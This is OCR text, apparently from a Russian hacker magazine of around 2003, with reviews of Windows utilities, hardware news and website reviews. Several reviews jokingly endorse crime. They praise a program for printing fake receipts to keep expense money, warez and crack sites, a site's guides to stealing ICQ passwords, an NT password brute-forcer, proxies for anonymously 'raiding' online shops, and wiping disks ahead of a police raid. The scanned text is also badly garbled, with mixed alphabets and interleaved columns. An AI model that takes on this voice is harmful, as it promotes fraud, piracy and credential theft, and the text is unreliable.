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Intro 


Свершилось! В этом месяце. Мат- 
рица, наконец, поимела всех по- 
настоящему, и все вникли, какого 
это - спустить М-ное количество 
тугриков на просмотр часа соплей 
плюс часа опупительных спецэф- 
фектов :). 

А еще в этом месяце вышел от- 
личный Спец, начиненный огром- 
ным количеством инфы по взлому. 
Тут уже проскакивала фраза про 
инструкцию MO сборке пулемета 
(см. рубрику е-тай). Но теперь все 
стало действительно серьезней, 
так как есть еще диск, где выложе- 
ны все эти пулеметные составляю- 
щие. Надеюсь, ты ‘уже большой 
мальчик, и будешь практиковаться 
исключительно Ha неодушевлен- 
ных мишенях :))). Иначе этот Спец 
может оказаться самым деструк- 
тивным! 

Ну все, не буду на этот раз отвле- 
кать тебя паранойей в интре, так 
как впереди тебя ждет действи- 
тельно кульное чтиво. Удачи! 
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Windows XP Creativity Fun 
Pack PowerToys 

точная ссылка меняется, так что 
ищи Ha download.microsoft.com 


елкомягкие выпустили He- 
большое дополнение к 


своим PowerToys. Если 
кто не знает, PowerToys это не- 
большой набор утилит, украша- 
лок и твикеров (tweakUl) для ХР от 
самого Microsoft. В дополнение 
входят две утилитки: Wallpaper 
changer и Video screensaver. 
Wallpaper changer позволяет ме- 
нять обои на рабочем столе через 
заданное время. А еще прога мо- 
жет выводить определенные обои 
в заданные дни. Для этого нужно 
создать в папке My Pictures nog- 
папки вида \Wallpaper\me- 
сяц_день и закинуть в нее необхо- 
димые картинки. В остальном все 
банально :). A вот Video $сгееп- 
saver - это более интересная ути- 
лита. С ее помощью можно поста- 
вить в качестве заставки любое 
видео или музон (из числа под- 
держиваемых windows media play- 
ег :)). Если поставить в качестве 
заставки музыкальный Файл, 
изображением для скринсейвера 
будет стандартная визуализация 
из Windows media player. Ну а для 
большего удобства можно задать 
как источник не один срайл, а це- 
лый плейлист. 


есьма забавная прога. Более 

96 МИЛЛИОНОВ советов. Ну 

где ты еще такое найдешь :). 
Можешь сидеть за компом хоть па- 
ру лет - они не повторяются. Поло- 
вина, правда, звучит как бред :). Но 
иногда попадаются очень меткие 
высказывания. А когда во время на- 
писания статьи за два часа (утро, я 
сижу уже всю ночь :)) gO сдачи он 
выдал мне: "В неурочный час рабо- 
тай на опережение" - я был в ауте :). 
Кроме простых высказываний в 
прогу зашито около 800 цитат 
(жаль только, нет режима, чтобы 
выводились только цитаты, а не все 
подряд). А еще советы могут пока- 
зываться на скринсейвере (могли 
бы сделать его и покрасивее). Глав- 


ное - при первом запуске поставь 
будильник. А то можно долго проси- 
деть, читая житейскую мудрость :). 
Что бы тебе такое сказать на про- 
щанье... а, вот: "Теперь сообщай ку- 
да следует" :). 


inRar - одна из немногих 

прог, обновление которых 

не приносит мне радости :). 
Почему? А потому что программа 
уже и так близка к идеалу. Сжатие 
принципиально не улучшается, но- 
вые функции почти не добавляются 
(да и не нужны они особо), космети- 
ческие изменения интерфейса мне 
глубоко безразличны. Зато в тече- 
ние месяца после выхода начинает- 
ся: то не могут открыть твой архив, 
то ты сам не можешь открыть его на 
чужой машине. Да еще и новый кряк 
искать :). Что же изменилось в этой 
версии? Теперь можно управлять 
атрибутами файлов при сжатии и 
распаковке. Разработчики особенно 
обращают внимание на сверхточную 
работу с временными атрибутами 
(время создания, время изменения, 
время последнего доступа). Хотя 
лично мне более важной показалась 
возможность сохранения атрибутов 


ntfs у файлов (имеются в виду права 
доступа). Ну и еще пачка разных ме- 
лочей вроде возможности переиме- 
нования файлов внутри архива 
(удивительно, что это не было сде- 
лано до сих пор) или корректной ра- 
боты с архивами, чье имя длиннее 
ста символов (маньяки есть?). Хотя 
что я тут пишу, все равно ведь при- 
дется качать, даже если изменений 
будет еще меньше... 


екоторые спрашивают: а как 

авторы делают скрины к про- 

гам? Ламоботы могут жать 
printscreen и вырезать нужное 
изображение в редакторе :). Умные 
же люди пользуются специальными 
прогами. Я лично использую доста- 
точно простую HyperSnap, но мно- 
гие предпочитают более наворочен- 
ный SnagIt, о котором и пойдет речь 
ниже. Более навороченный - это 
слабо сказано. Прога умеет делать 
скрины со всего экрана, с окна, с 
объекта в окне, с менюшек и выпа- 
дающих списков. Можно делать 
скрины произвольной области экра- 
на, причем любой формы. Можно 


делать скрины нестандартных окон, 
досовских окон, игр. Но это далеко 
не все возможности проги. С ее по- 
мощью ты можешь записать мувик с 
любой части экрана, захватывать 
текст с элементов окон (полезно, 
когда обычными методами скопиро- 
вать текст невозможно), закачивать 
изображения с сайтов, выдирать ре- 
сурсы из прог. В проге есть даже 
виртуальный принтер! Ну и, естест- 
венно, после захвата можно немно- 
го подкорректировать изображе- 
ние, применить различные эфорек- 
ты (среди доступных есть такая по- 
лезная штука, как watermark). Есть 
визард, чтобы долго не копаться в 


настройках. Ясен перец, прога плат- 
ная, но популярная. Так что вперед, 
в аптеку :). 
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Mass Е 


zarkon.hotbox.ru 


ебе приходилось массово 3a- 

менять линки в тексте или 

хтмл'ке? Или менять назва- 
ния файлов? А редактировать теги? 
А теперь как в рекламе: вам не нуж- 
но много разных прог, у вас же есть 
Mass Editor. Специально для даунов 
y нас есть визаро! Ну и, конечно же, 
русский язык. Еще никогда редакти- 
рование файлов не было таким лег- 
ким :). Ну а если серьезно, то, выб- 
рав список папок, расширений и 
файлов (хотя бы и в визарде), ты 
можешь применить четыре модуля 
для редактирования. Первый - рабо- 
та с текстом: замена и удаление 
текста, скриптов, изображений, оп- 
тимизация кода, удаление пустых 
строк (!), пробелов в конце предло- 
жений (!!), двойных пробелов (кол- 
леги меня поймут :)). Второй - работа 
с html: преобразование в текст и об- 
ратно, замена цветов, заголовков и 
ключевых слов. Третий - работа сте- 


гами mp3 (можно использовать имя 
файла и папки для подстановки в 
нужную часть тега). Четвертый - ра- 
бота с именами файлов (с возмож- 
ностью смены имен тр3-файлов на 
основе тегов). И все это добро бесп- 
латно! Правда, интерфейс немного 
кривоват и иногда выскакивают не- 
понятный ошибки, но сделаем скид- 
ку на то, что прогу написал восем- 
надцатилетний студент :). 
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принципе, когда ты будешь 

читать эту статью, уже 

должна выйти финальная 
версия проги, но и на release сапа!- 
dat понятно, что ты увидишь в не- 
далеком будущем. Итак, лучший 
чистильщик реестра заимел об- 
новленный интерфейс и новые 
функции. Теперь все утилиты рас- 
киданы по нескольким разделам: 
работа с реестром, работа с фай- 
лами, автоматизация (создание 
скриптов). Среди новых функций 
стоит особо отметить regisry snap- 
shot (делаем снимок реестра, по- 
том сверяем) и мастер-скриптов 
(если ты все же решил воспользо- 
ваться автоматизацией). Правда, 
работу с файлами так до ума и не 


довели. Зато в работе с реестром 
проге по-прежнему нет равных. И 
она остается бесплатной... 
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асскажу одну поучитель- 

ную историю. Выдали мне 

как-то на работе некую 
сумму на производственные рас- 
ходы. Хитро извернувшись, я сде- 
лал работу и потратил меньше 
половины суммы. Остаток очень 
хотелось положить в карман :). 
Но надо было как-то отчитаться 
перед бухгалтерией, а где cge- 
лать подходящие чеки на нужную 
сумму, я так и не нашел. Приш- 
лось возвращать :(. А вотесли бы 
я знал об этой проге раньше, 
можно было бы месяц не рабо- 
тать :). Хотя программка доволь- 
но старая... Итак, она служит 
простой задаче - отпечатывать 
нужные чеки. Реквизиты она хра- 
HUT у себя в базе, их можно д90- 
бавлять и редактировать. Можно 
разбивать сумму на несколько 
чеков или несколько товаров. В 
незарегистрированной версии 
можно напечатать только gBag- 
цать чеков, но регистрация вроде 
как бесплатная. Интерфейс, ко- 
нечно, кривой, но "вам шашечки 
или ехать?" 


дна из моих любимых примо- 
O чек для изменения интер- 

фейса Виндов. Заменяет 
стандартный quicklaunch на свой с 
возможностью группировать ярлы- 
ки в менюшки (экономит место на 
таскбаре), создавать раскрывающи- 
еся меню с содержимым папок (тебе 
еще нужна кнопка пуск?) и кучей 
плагинов (от часиков и различных 


мониторов до управления winamp). 
И ко всему этому добру можно при- 
менить скины, сделать менюхи по- 
лупрозрачными, повесить их на хот- 
кеи. В новой версии разработчики 
добавили автопереключение меню, 
а также возможность выставлять в 
качестве фона для менюшек кар- 
тинки в формате рпд. Автопереклю- 
чение работает так: ты создаешь 


несколько вариантов менюшек, 
каждый вариант под свой набор 
приложений. При запуске этих при- 
ложений меню станет соответствую- 
щим. Всем советую попробовать: 
привыкаешь к True Launch Bar 
очень быстро. Тем более что доста- 
точно скачать language pack, выста- 
вить русский язык, и прога не будет 
требовать регистрации! 
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СЕТЕВОЙ ЛАЗЕРНИК 


омпания Asus начала постав- вой кодек имеет омпания Samsung Electro- 
K ки новой матери A7V600, oc- S/PDIF выход, что несомненно явля- К nics представила новый 

нованной на новейшем чип- ется большим плюсом. Также под- беспроводный лазерный 
сете Via KT600 и поддерживающей gepxuBaetca функция Instant Music, принтер (модель ML-2150W), осна- 
процессор Athlon ХР 3200+, работа- позволяющая проигрывать mp3 без щенный целым набором новых 
ющий с 400 МГц системной шиной. загруженной операционной систе- удобных функций и обеспечивает 
Новинка также может похвастаться мы. Новинка поддерживает целую высокий уровень работы. Глав- 
поддержкой АСР8х, Serial АТА РАЮ, кучу современных фирменных ное достоинство нового принтера 
восьмью портами USB 2.0 и 1 Гбит функций - это ASUS CrashFree BIOS - это наличие встроенного бесп- 


сетевой картой, также присутствует 2, C.O.P для защиты от перегрева 
поддержка DDR4OO и 6-канального процессора, EZ Flash, MyLogo, C.P.R. 
звука. Стоит упомянуть, что 3BYKO- 
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роводного адаптера, поддержива- 
ющего протокол беспроводной 
связи 802.1 (Wi-Fi). Новинка так- 
же может подключаться к конт- 
роллеру USB 2.0 и обеспечивает 
высокую скорость, в 40 раз быст- 
рее, чем обычный стандарт по- 
сылки документов на печать с 
компьютера на принтер. 

Новый лазерник может напечатать 
go 20 страниц за одну минуту, при- 
чем для того, чтобы обеспечить 
беспрерывную работу на такой ско- 
рости, в лоток можно положить до 
1100 страниц бумаги. Как и в боль- 
шинстве лазерников Samsung, в 
принтере присутствует режим эко- 
номичной работы, что позволяет 
сократить расход тонера и на 40 
процентов продлить срок эксплуа- 
тации картриджа. Также поддержи- 
вается двухсторонняя печать. 
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K омпания Asus представила основана на 6-канальном кодеке от 
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новую мать серии Х под ADI и поддерживает все самые по- 

Socket 478, это РАРЕ-Х. Но- пулярные технологии, такие как 
вая плата поддерживает все процы Microsoft DirectX 8.0, Microsoft 
Pentium 4/Celeron и поддерживает DirectSound 3DT, A3D, МасгоЕХ, 
частоты процессора go 3,2 ГГц. ZoomFX, MultiDrive 5.1, A3D и EAX. 
Мать поддерживает 800 МГц FSB, Также поддерживается воспроиз- 
на нее можно поставить 2 гига па- ведение звука формата 5.1, есть 
мяти стандарта PC2700 / РС2100/ S/PDIF выход. Плата имеет nogge- 
РС1600 non-ECC DDR SDRAM. РАРЕ- ржку всех современных, фирмен- 
Х также содержит в себе сетевуш- ных технологий ASUS, таких как 
ку 10/100 от Broadcom, интерфейс ASUS CrashFree BIOS, EZ Flash, 
UltraDMA/100, 6 портов USB 2.0 и MyLogo. Несмотря на неплохие ха- 
звуковую систему SoundMAX рактеристики, заявлено, что плата 
Digital Audio System, о которой сто- будет недорогая. 
ит рассказать подробней. Система 
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омпания Pinnacle Systems на- 

чинает поставки трех новых 

устройства видеомонтажа 
Все устройства внешние, подключа- 
ются через интерфейсы USB или 
IEEE-1394. Устройства поддержива- 
ют стандарты PAL/SECAM с разре- 
шением до 720х576. 
Модель MovieBox DV представляет из 
себя двунаправленный конвертер 
“aHanor-DV" и имеет возможность ав- 
тономной работы. Так же имеются 
композитные и S-Video видеовходы- 
выходы, звуковые РСА стереовходы- 
выходы. В комплекте с устройством 
идут 2 кабеля (4-6 pin и 6-6 pin) для 
подключения к компьютеру. 
Модели MovieBox USB и PCTV Deluxe 
оснащены интерфейсом USB2.0 и 


возможностью аппаратного кодиро- 
вания потока в MPEGI/2. Различие 
моделей состоит в том, что МомеВох 
USB и MovieBox DV содерж!т необхо- 
димые входы-выходы, а PCTV Deluxe 
имеет только входы, он также укомп- 
лектован пультом ДУ. Представлен- 
ные модели позволяют в реальном 
времени сжимать видео в MPEGI с 
потоком go ЗМбит/с и в МРЕС2 с no- 
током go 12 Мбит/с, а модель PCTV 
Deluxe - go 15 Мбит/с. 

Устройства обладают небольшими 
системными требованиями, 
MovieBox USB и MovieBox DV хотят 
такую конфигурацию: Pentiumlll/ 
Athlon 500Mfu, 128Мб O3Y, 
DirectX8-coBMecTuMble графический 
адаптер и звуковая плата, Windows 


98SE/ME/2000/XP. Системные Tpe- 
бования PCTV Deluxe несколько вы- 
ше, она хочет для работы 70ОМГц 
процессор и Windows МЕ. Со всеми 
устройствами поставляется русская 
версия программы Studios. 


PSON Corporation объявила о 

начале поставок ффотопринте- 

pa EPSON Stylus Photo 8304. 
Новый принтер шестицветный и оп- 
тимизирован под разрешение 5760 
точек на дюйм - (Resolution 
Performance Management), 6naroga- 
ря этому можно получить фотогра- 
фии, не уступающие качеством ‹ро- 
тографиям, напечатанным в фото- 
лаборатории. Новая функция печа- 
ти без полей позволяет выводить 
фотки без рамок по краям листа. 
Также поддерживается функция 
печати каплями разного размера, 
благодаря которой достигается 
достаточно высокая скорость. Og- 
нотонные участки изображения пе- 
чатаются каплями крупного разме- 
ра, а те части, где требуется прори- 
совка мелких деталей, печатаются 
каплями меньшего размера. Ско- 
рость печати принтера - 14 черно- 
белых страниц в минуту и 13.7 цвет- 
ных страниц в минуту. Минималь- 
ный размер капли составляет 4 пи- 
колитра. Новинка подключается к 
компьютеру при помощи интер- 
qenca USB, для этого на передней 
и задней панелях принтера имеет- 
ся два USB интерфейса (для наибо- 
лее удобного подключения). 
В комплекте с принтером идут Cocp- 
тины PhotoQuicker 3.4 и Print Image 
Frame Designer. Первая предназна- 
чена для прикручивания к фотог- 
рафиям всяческих рамок и прочих 
украшательств, а вторая - для соз- 
дания своего собственного оформ- 
ления снимков. 


НОВИНКИ ОТ R&K 


омпания R&K представила 

две новые модели компьюте- 

ров серии Wiener Pro, это 
W4530 и W2510. Эти модели основа- 
ны на связке процессора Intel® 
Pentium® 4 с тактовыми частотами 
2,8, 2,6 и 2,4 ГГц с поддержкой тех- 
нологии Hyper-Threading, и новых 
наборах микросхем - Intel 865РЕ и 
Intel 865С. Компания R&K планиру- 
ет gO конца 2003 года перевести ос- 
новную часть своих настольных 
систем серий Wiener Pro и Wiener4 
на базу наборов микросхем 1865 и 
1875. Модель Wiener Pro W4510 
предназначена для пользователей, 
нуждающихся в компьютерах клас- 
ca Middle и High End по разумной це- 
не. В основе данной модели лежит 


набор микросхем i865-PE, который 
работает с 800 МГц системной ши- 
ной и двухканальной памятью стан- 
дарта DDR DRAM PC3200, и имеет 
поддержку современных видеокарт 
с интерфейсом АСР 8х. Процессор с 
технологией НТ позволяет намного 
эфорективней использовать много- 
задачные операционные системы. 
Например, можно одновременно и 
без ущерба для скорости играть, ка- 
чать гигабайтами из сети сост и за- 
писывать диски. Но мощный процес- 
сор - это еще не все, в компьютерах 
установлена хорошая видеокарта 
на базе АТ! Radeon 9500 и быстрый 
жесткий диск с современным интер- 
фейсом Serial АТА и скоростью вра- 
щения шпинделя 10 000 об/мин. 


ЕЩЕ ОДИН BLUETOOTH 


омпания SMART Modular 

Technologies выпустила USB 

Bluetooth адаптер, который 
имеет полную совместимость со 
спецификациями Bluetooth 1.1 и 
USB 1.1. Новинка имеет очень не- 
большие размеры, всего 58 х19 x 9 
мм и может использоваться как в 
обычных, настольных компьюте- 
рах, так и в ноутбуках для связи с 


SMART 


другими устройствами, поддержи- 
вающими этот стандарт, например, 
с разнообразными гаджетами, име- 
ющими поддержку Bluetooth или 
для доступа в Интернет через спе- 
циальный модем или мобильник. 
Устройство оснащено 8 Мб памяти, 
дальность действия - 30 м. Цена 
составляет примерно 35$. 
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арезных сайтов в Интернете - 

великое множество. Такие 

сайты, как Softdoc.ru, я встре- 
чал крайне мало. Идея его такова - на 
сайте размещаются статьи и доки 
(инструкции по пользованию) раз- 
личным сосфтом. Сделан сайт доволь- 
но стильно, навигация удобная. Ос- 
новные разделы - графика, защита, 
Интернет, мультимедиа, операцион- 
ные системы и другие. 
Особо радуют раздельчики "Желе- 
30" и "Маленькие хитрости". Пер- 
вый посвящен как проблемам ра- 
боты с железом, так и железячно- 
софтовым (например, вопросу раз- 
бивке винта на разделы). Второй 
же посвящен скрытым (и просто 


труднодоступным) настройкам сис- 
темы и программ. 

Переходы от разделов к статьям 
тоже организованы удобно: в виде 
окошка-анонса публикуются наз- 
вание, автор, дата публикации, 
объем (!) статьи/доки и количество 
просмотров доки. Можно оставлять 
комментарии к любой. Радует, что 
авторы сайта не ограничивают се- 
бя особой этикой - публикуются, 
например, доки о том, как пароль- 
чики к аськам зашибать ;-). 

На сайте действует довольно посе- 
щаемый форум, где можно, напри- 
мер, предложить программу для 
рассмотрения и написания доки. 
Явный плюс - на сайте есть номера 


асек всех админов сайта, можно 
легко связаться. 

Проект довольно новый, но быстро 
развивается и часто обновляется. 


рпето.ги - довольно часто 
обновляющийся блог, пос- 
вященный, как и множество 
других, свежему софту, музыке, 
фильмам - всему, что мы ищем в 
сети! ;-). 
Что особо отличает сайт - стильный 
дизайн, практически к каждой не 
бесплатной программе приложен 
кряк или серийник. Все программы 
выкладываются на сайт с кратким 
или подробным обзором и скрин- 
шотами. 
Раздел музыки и видео обновляется 
значительно реже, но продуманность 
и качество остаются на уровне. Если 
выкладывается какая-то музыка - то, 
как правило, целым альбомом, с об- 
ложкой и в хорошем битрейте и т.д. 


В каждом из еженедельных выпусков 
игрового раздела - новая игра, goc- 
тупная для скачивания, с обзором и 
дополнительной информацией. 
Особо хочется рассказать о раздел 
Shopping. Несмотря на то, что он 
давно не обновлялся, весьма инте- 
ресны и старые его материалы. 
Идея Shopping такова - здесь вык- 
ладываются обзоры о магазинах и 
фирмах (как правило, компьютер- 
ных). При этом описывается сам ма- 
газин, отношение к клиентам, отме- 
чаются другие тонкости. Основные 
преимущества и недостатки выно- 
сятся в конец обзора. 

Раздел Other говорит сам за себя. 
Здесь помещается информация из 
всех областей - обзоры и ссылки на 


новый софт, забавные картинки, 
юмористические тексты и т.п. 
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айт привлечет всех, кто ин- 

тересуется оружием. Нес- 

мотря на то, что он находит- 
ся на халявном хостинге, на кон- 
тенте это явно не сказалось. 
Информации очень много. Боль- 
шое внимание уделено структури- 
рованию - образцы разделены по 
классам оружия, а уже внутри каж- 
goro класса - на советские-русские 
и на иностранные разработки. 
Практически к каждому экземпля- 
ру идет фотография. Сочетается 
история создания и развития об- 
разца с характеристиками его в ви- 
де таблицы. 
Кроме основных разделов есть от- 


дельный о производителях стрел- 
кового оружия (как наших, так и 
буржуйских), в котором более 300 
(!) наименований с официальными 
ссылками на сайт производителя! 
Из них наших - 9, сайты есть у 
двух... да уж! Сайты не делают, зато 
оружие какое! ;-) "Наш бронепоезда 
стоит на запасном пути". 

В разделе "Библиотека" подобра- 
ны законы РФ, относящиеся к ору- 
жию, биографии некоторых извест- 
ных оружейных конструкторов и 
несколько статей. 

Особо интересен раздел "Мульти- 
медиа". Там собраны видеофраг- 
менты о некоторых из моделей ору- 


жия как в RealVideo, так и в тро-, 
а\!-срорматах. 
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сем автопутешествующим 
личностям - настольная лин- 
ка ;-). Остальным тоже долж- 
но понравиться. На сайте можно пос- 
читать расстояние от одного города 
go другого. В пределах Европы и 
exUSSR-ucton Азии. Причем - в базе 
даже мелкие города. 
Но это так, в двух словах. А там еще - 
примерное количество времени, пере- 
секаемые границы, ПОЛНЫЙ маршрут 
с указанием номеров трасс и уровнем 
дорог (автомагистрали, обычные и 
T.g.). Можно указать GO трех городов - 
через которые должен пролегать 
маршрут. Есть режим оптимизации по 


времени. Можно исключать из марш- 
рута определенные границы (ну не 
нравится какая-то страна... ;)) и так да- 
лее... В общем - супер!! Такими удоб- 
ными мелочами и жив Рунет... 


усский поисковик кряков. 

Что тут еще сказать? ;-) В 

отличие от большинства 
буржуйских аналогов - никаких 
порнобаннеров, всплывающих 
окон и т.д. Все просто и стильно. 
Серый фон, пять ссылок, поиско- 
вая форма. А что еще надо-то? ;-) 
Явный плюс - поисковик ищет не 
только по всем известным буржуйс- 
ким складам кряков, но и по некото- 
рым русскоязычным сайтам. 
Чего спрашиваешь? Куда ведут те 
самые пять линков? Ишь какой 
внимательный... ;). Линки - это раз- 
делы форума. Обзоры софта, по- 


http://crack.x-forum.info 


иск вареза, публикующиеся линки 
на крякнутый софт - что еще надо 
для полного счастья? 


Builder C++ 


le 
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Builder C+ 


айт по достоинству оценят 

программеры на С++. Час- 

то обновляющийся, конте- 
нтный сайт, посвященный С++ 
Builder. 
Информация на сайте разбита по 
разделам, и один другого краше! 
В разделе "Статьи" огромное ко- 
личество статей, рассчитанных и 
на новичков, и на профи. Все 
статьи разбиты на разделы по 
сфере программирования - базы 
данных, формы, Интернет, дист- 
рибутивы, Windows API, графика, 
мультимедиа и многие другие. 
В отдельном разделе выложены 
готовые исходники некоторых 
программ в сочетании со статья- 
ми по теме - это то, что доктор 
прописал! 
Выложены некоторые из бесплат- 
ных компонентов к C++ Builder. И 
для новичков, и для продвинутых 
будут не лишними линки на круп- 
ные FAQ по C++ Builder'y и в целом 
по С++. По материалам сайта ве- 
дется рассылка, есть свой форум. 


сем асечникам, чатланам и 
прочему виртуально общаю- 
щемуся люду посвящается! 

"Красные глаза" - своего рода ака- 

демия виртуального общения, 

здесь в подробных, интересных и 

очень увлекательных статьях рас- 

писаны все тонкости виртуального 
общения. 

Основное разделение на сайте по 

опыту общения посетителя. Разде- 

лы "юным" и "бывалым" говорят 
сами за себя. 

Информация на сайте будет полез- 

на всем: начинающим пользовате- 

лям она поможет не попасть впро- 
сак на первых стадиях общения, 
более продвинутым здесь расска- 

зано о прелестях, опасностях и 

перспективах виртуального обще- 

ния. Зачастую приведены вполне 
конкретные примеры. Не менее ин- 


тересным будет эта информация 
gna тех, кто планирует открыть 
свой чат, форум или что-то подоб- 
ное. Инфа на сайте поможет сде- 
лать ресурс уютным, притягиваю- 
щим новых пользователей. 

Раздел "Паноптикум" тоже весьма 
интересен. Здесь показаны типич- 
ные персонажи виртуальных сооб- 
ществ. Они изображены с некото- 
рым гротеском, добавляющим юмо- 
ра, но "в каждой сказке есть доля 
правды". Причем здесь эта доля 
весьма велика. Любой человек, не- 
которое время проведший в чатах 
и форумах, без труда узнает в 
изображенных персонажах вполне 
реальные личности. 

Аеще на сайте - коллекция чатовс- 
ко-форумского юмора, подборка 
интересных программ для продви- 
нутого общения и многое другое. 


Свой форум на сайте организован 
по принципу наименьшего вмеша- 
тельства администрации в сочета- 
нии со свободой выбора своего 
круга общения. 

Сайт динамично развивается, кро- 
ме указанных разделов есть много 
других весьма интересных, кото- 
рые только планируются и напол- 
няются. 


НОВОСТИЛЛЕВ 
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ра! Сегодня мне наконец раз- 
решили посвятить деливери 
любимой теме - паранои- 
дальному выживанию под BuHgon. 
Но для начала я хотел бы расска- 
зать об этой проге, хотя к паранойе 
она имеет лишь косвенное отноше- 
ние. Маленькая утилита, которая за- 
нимается хешами МТ'евых паролей. 


Г МТ eT в | 


Причем занимается плотно - от 
простого импорта 5АМ'ок с локаль- 
ной машины gO серьезного брут- 
форса с неплохой скоростью. Плюс 
ко всему она имеет уникальную в 
своем роде дишку - генерация кода 
хеша по заданному паролю. Манья- 
кам, которые предпочитают читать 
хексы, такая маза должна понра- 
виться. В целом мы получили еще 
одну полезняшку, которую можно 
опять же записать на "хакболван- 
ку". На моей кредитке (16 метров) 
уже не остается свободного места :) 
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Имя: SurfNOW Professional 2.1 
Платформа: win (nt) 
Политика: shareware 

Весит: 940 Кб 

Веб: www.loomsoft.com 


чередной проксевый рулеж- 
ник, позволяющий оставать- 

ся анонимным даже во время 
группового изнасилования интернет- 
магазинов :). На сей раз отличитель- 
ными чертами оказались симпотней- 
ший сфейс - верх эргономики и эстети- 
ки, а также система поиска новых 
проксиков. Представь себе - теперь 
не нужно ходить на Войд и прове- 
рять, не пропалили ли еще злобные 
дядьки все твои анонимные сервач- 
ки. Просто время от времени надо на- 
жимать на кнопочку "Поискать прок- 
си", и твой список пополнится на нес- 
колько десятков новых серваков. Ко- 
нечно, все стандартные фичи прок- 
сичекера/ченджера никуда не ge- 
лись - список можно пополнять и 
проверять вручную, смена прокси- 


и пл или, 


ков происходит легко и непринуж- 
денно, в общем - все 31337 удоволь- 
ствий :). Наверно, более всех эту про- 
гу оценят начинающие, те, кого не 
хватило на настройку Anonymity 4 
Proxy и ей подобных. Здесь же имеет- 
ся комплекс мастеров практически 
для всех выполняемых задач - 
вплоть 90 автоматической настройки 
браузера (!), в том числе и Оперы (!!). 
Кстати, он еще и подтирает кукисы и 
хистори всех виндовых прог, вклю- 
чая WMP :). Why not to try? 


Load and analyze proxies to hide my IP! 


oA, 


SurPNOW needs one or more anonymous proxy to hide your IP address... 


Extracting from Google 
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ифруешься? Везде и 

всегда, от девушек и 

предков, от босса и от 
младшей сестренки? Хе, это пра- 
Вильно :). А для того чтобы процесс 
ныканья был максимально прият- 
ным, рекомендую одеться в черный 
обтягивающий комбез, нацепить на 
лоб фонарик, выключить в кварти- 
ре свет и под покровом ночи запус- 
тить IS :). Шесть функций, сосредо- 
точенных в стильном окошке (MI2, 
все дела), призваны развить в тебе 
открытость и любовь к ближним. 
Ведь ты будешь на 100% уверен, 
что они о тебе ничего не знают... Ну, 
кроме того, что ты сам им разбол- 
тал :). Итак, в окне маячат следую- 
щие сричи. File Hider позволяет ны- 
кать страшную инфу в безобидные 
BMP, JPEG и прочие НТМЕ-файлы. 


Штука полезная, я думаю, все посе- 


тители winfo.org скоро о ней услы- 
wat :). Encrypt Files - стандартный 
криптовщик файлов, шесть алго- 
ритмов инклюдед. Self-Decrypting 
Package позволяет создавать из 
бфрайлов (или файла) пакет с моду- 
лем раскриптовки по паролю. То 
есть если ты пересылаешь кому-то 
зашифрованный файл, он может 
его расшифровать, даже не имея 
на компе IS. Shred Files - приятный 
уничтожитель файлов с поддерж- 
кой мировых стандартов. IP-to-IP 
Password Transfer позволяет пре- 
давать пароли по шифрованному 
соединению, сомнительная фича, 
но под общую параноидальную те- 
му прокатит :). Application Locker - 


повторяет функции PC Security, так 
что лежит тут совершенно до кучи 
5). В целом получается вполне снос- 
ный набор тулз для повседневного 
использования. 


овсем не параноидальная инора 

под конец: в очередной раз об- 

новился комплекс многоцеле- 
вого назначения ЕМТ. Для спящих 
крепким сном напомню, что в состав 
этого шампуня с бальзамом-ополаски- 
вателем входят следующие компонен- 
ты: NetStat, продвинуто отображаю- 
щий все соединения машины; NBScan, 
сканящий сетку по NetBIOS; Portscan, 
идущий без комментариев; Shares, не 
требующий их тоже :); LMHosts для 
правки соответствующего файла с 
хостами; NetAudit для проверки уязви- 
мостей МВ; RawTCP для прямой уста- 
новки соединений; TraceRoute, Ping, 
Lookup - сам понимаешь оля чего :) - и 
вьюер процессов для тех, кого не уст- 
раивает Ctrl-Shift-Esc. Все в комплекте 
выполнено в едином стильном между- 
мордии, профессиональная направ- 
ленность подчеркнута практически 
везде (от хелпа до типсов). Так что к 
использованию в качестве комбайна 
софтина не просто пригодна - она 
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строго рекомендуется. Фанатам 1Р- 
tools просьба не беспокоиться :) 


Имя: PC Security 5.5 
Платформа: win 
Политика: shareware 
Весит: 940 Кб 

Веб: www.tropsoft.com 


от она - паранойя в чистом ви- 

де. Прога с таким невинным 

названием занимается страш- 
ными вещами - лочит намертво проги, 
окна, ярлыки, диски, папки. Причем, в 
отличие от виндового лока через ре- 
естр, обойти такую защиту непросто. 
Лок-разлок можно привязать ко вре- 
мени, и тогда все страшные папки бу- 
дутзакрыты днем, а вот ночью... ;) Кста- 
ти, под страшными папками можно по- 
нимать как хранилищатвоих любим ых 


хак-тулз, так и спрятанную OT брати- 
шек порнуху :). Так что если ты за ком- 
пом не один и назревают опасения, что 
простое разделение прав в 2К уже не 
помогает (родственники сильно подтя- 
нулись по информатике), обязательно 
пощупай этот мегарестриктер. 
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рога, о которой я мечтал всю 

сознательную жизнь, воп- 

лотилась в этом полумего- 
вом инсталляторе. Помнится, дав- 
ным-давно я писал страшные бат- 
ники, превращающие винт в 
девственно чистый кусок алюминия 
с загрузочными файлами. У таких 
батников, записанных на дискетку, 
была куча применений: очищать 
ламоботские харды от дерьма пе- 
ред установкой новой системы, под- 
готавливать диск к продаже (да, все 
мы барыжили хардварем), беззлоб- 
но шутить над друзьями :). А потом 
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gO меня дошло, что иметь такую 
дискету полезно на случай внезап- 
ного выключения электричества, 
совмещенного со стуком кирзовых 
сапог в дверь :). Но format и fdisc He 
дают гарантии стопроцентной чис- 
тоты. A KFC позволяет почистить 
винт практически наглухо, не оста- 
вив никому шанса на восстановле- 
ние инфы. Ну разве не прелесть? 
Рекомендуется к активному исполь- 
зованию на компах друзей... Или, в 
самом крайнем случае (тьфу*3), на 


своем... 
e-shop 
http://www.e-shop.ru 


ы хочешь, что- 
бы на улице, в 
школе и уни- 
вере, среди знакомых 
и незнакомых все 


сразу видели, что ты - 
читатель Хакера? 

Не проблема! Специ- 
ально для тебя мы по- 
догнали целую кучу 
фэнского Х-стафора, 
который ты можешь 


купить в нашем Интер- 
нет-магазине Е-5Пор 


(www.e-shop.ru). Что- 
бы получить БЕСП- 


Получить БЕСПЛАТНЫЙ 
каталог с фэнскими вещами 
Хакер и Хулиган 


ЛАТНЫЙ каталог Е- 


Shop достаточно за- 


корпус 


индекс 
полнить этот купон город 
или форму на сайте улица 
www.xakep.ru. He дом 
ее | | S22eTP4 
' H b 
ФИО 


команды! 


Отправьте купон по адресу: 101000, 
Москва, Главпочтамт, а/я 652, E-Shop 
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Сводки с заразного 
фронта 18 
Стек 2, перезагрузка 20 
Цепные псы 22 


СТЕКуемся? 24 


БЛОКАДА ХАКЕРАМ: 


О ФАЕРВОЛЛАХ В ЛИНЬ И ВЫНЬ 


